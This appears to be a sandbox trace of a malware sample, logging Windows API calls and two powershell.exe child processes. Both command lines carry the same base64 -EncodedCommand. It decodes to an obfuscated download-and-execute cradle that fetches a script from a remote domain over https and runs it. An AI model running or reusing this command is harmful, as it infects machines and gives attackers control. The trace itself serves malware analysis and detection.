	[0962.279] VerQueryValueW (in: pBlock=0x2e731c0, lpSubBlock="\\", lplpBuffer=0x26d858, puLen=0x26d850 | out: lplpBuffer=0x26d858*=0x2e731e8, puLen=0x26d850) returned 1
	[0962.287] CoTaskMemAlloc (cb=0x104) returned 0x51b250
	[0962.287] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51b250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0962.287] CoTaskMemFree (pv=0x51b250) 
	[0962.291] CoTaskMemAlloc (cb=0x104) returned 0x51b250
	[0962.291] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51b250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0962.291] CoTaskMemFree (pv=0x51b250) 
	[0962.294] lstrlenW (lpString="䅁") returned 1
	[0962.302] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d728 | out: phkResult=0x26d728*=0x2ec) returned 0x0
	[0962.303] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d718 | out: phkResult=0x26d718*=0x2f0) returned 0x0
	[0962.304] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d7a8 | out: phkResult=0x26d7a8*=0x2f4) returned 0x0
	[0962.522] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d6ec, lpData=0x0, lpcbData=0x26d6e8*=0x0 | out: lpType=0x26d6ec*=0x1, lpData=0x0, lpcbData=0x26d6e8*=0x56) returned 0x0
	[0962.523] CoTaskMemAlloc (cb=0x5a) returned 0x4cdb10
	[0962.523] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d6bc, lpData=0x4cdb10, lpcbData=0x26d6b8*=0x56 | out: lpType=0x26d6bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d6b8*=0x56) returned 0x0
	[0962.523] CoTaskMemFree (pv=0x4cdb10) 
	[0962.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0962.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0962.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0962.550] CoTaskMemAlloc (cb=0x104) returned 0x51b250
	[0962.550] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51b250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0962.550] CoTaskMemFree (pv=0x51b250) 
	[0964.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0964.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0964.959] CoTaskMemAlloc (cb=0x104) returned 0x51b360
	[0964.959] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51b360, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0964.959] CoTaskMemFree (pv=0x51b360) 
	[0964.961] CoTaskMemAlloc (cb=0x104) returned 0x51b360
	[0964.961] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51b360, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0964.961] CoTaskMemFree (pv=0x51b360) 
	[0965.346] CoTaskMemAlloc (cb=0x104) returned 0x51b360
	[0965.346] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51b360, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0965.346] CoTaskMemFree (pv=0x51b360) 
	[0965.348] CoTaskMemAlloc (cb=0x104) returned 0x51b360
	[0965.348] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51b360, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0965.348] CoTaskMemFree (pv=0x51b360) 
	[0965.348] CoTaskMemAlloc (cb=0x104) returned 0x51b360
	[0965.348] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51b360, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0965.348] CoTaskMemFree (pv=0x51b360) 
	[0966.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0966.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0966.634] CoTaskMemAlloc (cb=0x104) returned 0x51b360
	[0966.634] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51b360, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.634] CoTaskMemFree (pv=0x51b360) 
	[0966.637] CoTaskMemAlloc (cb=0x104) returned 0x51b360
	[0966.637] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51b360, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.637] CoTaskMemFree (pv=0x51b360) 
	[0967.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0967.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0970.016] CoTaskMemAlloc (cb=0x104) returned 0x51b580
	[0970.017] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51b580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.017] CoTaskMemFree (pv=0x51b580) 
	[0970.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x26d400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0970.497] SetErrorMode (uMode=0x1) returned 0x1
	[0970.497] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x26d680 | out: lpFileInformation=0x26d680*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0970.497] SetErrorMode (uMode=0x1) returned 0x1

Thread:
	id = 1073
	os_tid = 0x14c4


Thread:
	id = 1101
	os_tid = 0x16f0


Thread:
	id = 1641
	os_tid = 0x225c


Thread:
	id = 1657
	os_tid = 0x22a4


Thread:
	id = 1674
	os_tid = 0x2318


Thread:
	id = 1739
	os_tid = 0x1ca4


Thread:
	id = 2092
	os_tid = 0x1d58


Thread:
	id = 2093
	os_tid = 0x1bf4

	[0947.587] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Process:
	id = "180"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3706c000"
	os_pid = "0x1b00"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1016
	os_tid = 0x1b04

	[0554.625] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1085
	os_tid = 0x15ac


Thread:
	id = 1108
	os_tid = 0x1700


Thread:
	id = 1610
	os_tid = 0x21c8


Thread:
	id = 1617
	os_tid = 0x21fc


Thread:
	id = 1686
	os_tid = 0x2380


Thread:
	id = 1778
	os_tid = 0x1de8


Process:
	id = "181"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3137b000"
	os_pid = "0x1b30"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1024
	os_tid = 0x1b34

	[0554.515] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0827.571] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0837.319] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0837.321] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0837.321] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0837.321] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0918.327] sprintf_s (in: _DstBuf=0x22f538, _DstSize=0x11, _Format="get_%s" | out: _DstBuf="get_MemberType") returned 14
	[0940.963] GetVersionExW (in: lpVersionInformation=0x22e040*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22e040*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0940.964] GetVersionExW (in: lpVersionInformation=0x22e040*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22e040*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0940.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0941.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0941.205] GetVersionExW (in: lpVersionInformation=0x22ddb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22ddb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0941.206] SetErrorMode (uMode=0x1) returned 0x1
	[0941.207] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x22df10 | out: lpFileInformation=0x22df10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0941.207] SetErrorMode (uMode=0x1) returned 0x1
	[0941.210] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x22e180 | out: lpdwHandle=0x22e180) returned 0x94c
	[0941.212] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2da72f0 | out: lpData=0x2da72f0) returned 1
	[0941.214] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22e0f8, puLen=0x22e0f0 | out: lplpBuffer=0x22e0f8*=0x2da738c, puLen=0x22e0f0) returned 1
	[0941.216] lstrlenW (lpString="䅁") returned 1
	[0941.224] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x2da7468, puLen=0x22e060) returned 1
	[0941.225] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0941.226] CoTaskMemAlloc (cb=0x2e) returned 0x374ad0
	[0941.226] lstrcpyW (in: lpString1=0x374ad0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0941.227] CoTaskMemFree (pv=0x374ad0) 
	[0941.227] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x2da74bc, puLen=0x22e060) returned 1
	[0941.227] lstrlenW (lpString="System.Management.Automation") returned 28
	[0941.227] CoTaskMemAlloc (cb=0x3c) returned 0x32ff00
	[0941.227] lstrcpyW (in: lpString1=0x32ff00, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0941.227] CoTaskMemFree (pv=0x32ff00) 
	[0941.227] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x2da7518, puLen=0x22e060) returned 1
	[0941.227] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0941.227] CoTaskMemAlloc (cb=0x20) returned 0x37a180
	[0941.228] lstrcpyW (in: lpString1=0x37a180, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0941.228] CoTaskMemFree (pv=0x37a180) 
	[0941.228] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x2da7558, puLen=0x22e060) returned 1
	[0941.228] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0941.228] CoTaskMemAlloc (cb=0x44) returned 0x32ff00
	[0941.228] lstrcpyW (in: lpString1=0x32ff00, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0941.228] CoTaskMemFree (pv=0x32ff00) 
	[0941.228] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x2da75c0, puLen=0x22e060) returned 1
	[0941.228] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0941.228] CoTaskMemAlloc (cb=0x76) returned 0x31f2e0
	[0941.228] lstrcpyW (in: lpString1=0x31f2e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0941.228] CoTaskMemFree (pv=0x31f2e0) 
	[0941.228] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x2da765c, puLen=0x22e060) returned 1
	[0941.228] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0941.228] CoTaskMemAlloc (cb=0x44) returned 0x32ff00
	[0941.228] lstrcpyW (in: lpString1=0x32ff00, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0941.228] CoTaskMemFree (pv=0x32ff00) 
	[0941.228] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x2da76c0, puLen=0x22e060) returned 1
	[0941.228] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0941.228] CoTaskMemAlloc (cb=0x58) returned 0x2d5740
	[0941.228] lstrcpyW (in: lpString1=0x2d5740, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0941.228] CoTaskMemFree (pv=0x2d5740) 
	[0941.228] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x2da773c, puLen=0x22e060) returned 1
	[0941.228] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0941.228] CoTaskMemAlloc (cb=0x20) returned 0x37a180
	[0941.228] lstrcpyW (in: lpString1=0x37a180, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0941.228] CoTaskMemFree (pv=0x37a180) 
	[0941.229] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x2da73e4, puLen=0x22e060) returned 1
	[0941.229] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0941.229] CoTaskMemAlloc (cb=0x66) returned 0x2fc2f0
	[0941.229] lstrcpyW (in: lpString1=0x2fc2f0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0941.229] CoTaskMemFree (pv=0x2fc2f0) 
	[0941.229] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x0, puLen=0x22e060) returned 0
	[0941.229] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x0, puLen=0x22e060) returned 0
	[0941.229] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x0, puLen=0x22e060) returned 0
	[0941.229] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22e038, puLen=0x22e030 | out: lplpBuffer=0x22e038*=0x2da738c, puLen=0x22e030) returned 1
	[0941.230] CoTaskMemAlloc (cb=0x204) returned 0x321e70
	[0941.230] VerLanguageNameW (in: wLang=0x0, szLang=0x321e70, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0941.233] CoTaskMemFree (pv=0x321e70) 
	[0941.233] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\", lplpBuffer=0x22e088, puLen=0x22e080 | out: lplpBuffer=0x22e088*=0x2da7318, puLen=0x22e080) returned 1
	[0941.236] GetCurrentProcessId () returned 0x1b30
	[0941.428] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x22cfb0 | out: lpLuid=0x22cfb0*(LowPart=0x14, HighPart=0)) returned 1
	[0941.430] GetCurrentProcess () returned 0xffffffffffffffff
	[0941.431] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x22cfd0 | out: TokenHandle=0x22cfd0*=0x2d0) returned 1
	[0941.431] AdjustTokenPrivileges (in: TokenHandle=0x2d0, DisableAllPrivileges=0, NewState=0x2daab68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0941.433] CloseHandle (hObject=0x2d0) returned 1
	[0941.436] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1b30) returned 0x2d0
	[0941.444] EnumProcessModules (in: hProcess=0x2d0, lphModule=0x2daabd0, cb=0x200, lpcbNeeded=0x22dfe8 | out: lphModule=0x2daabd0, lpcbNeeded=0x22dfe8) returned 1
	[0941.445] GetModuleInformation (in: hProcess=0x2d0, hModule=0x13f370000, lpmodinfo=0x2daae40, cb=0x18 | out: lpmodinfo=0x2daae40*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0941.446] CoTaskMemAlloc (cb=0x804) returned 0x37b1f0
	[0941.446] GetModuleBaseNameW (in: hProcess=0x2d0, hModule=0x13f370000, lpBaseName=0x37b1f0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0941.446] CoTaskMemFree (pv=0x37b1f0) 
	[0941.447] CoTaskMemAlloc (cb=0x804) returned 0x37b1f0
	[0941.447] GetModuleFileNameExW (in: hProcess=0x2d0, hModule=0x13f370000, lpFilename=0x37b1f0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0941.447] CoTaskMemFree (pv=0x37b1f0) 
	[0941.448] CloseHandle (hObject=0x2d0) returned 1
	[0941.454] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x1b30) returned 0x2d0
	[0941.455] GetExitCodeProcess (in: hProcess=0x2d0, lpExitCode=0x22e118 | out: lpExitCode=0x22e118*=0x103) returned 1
	[0941.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12dab088, Length=0x20000, ResultLength=0x22e0e0 | out: SystemInformation=0x12dab088, ResultLength=0x22e0e0*=0x4a000) returned 0xc0000004
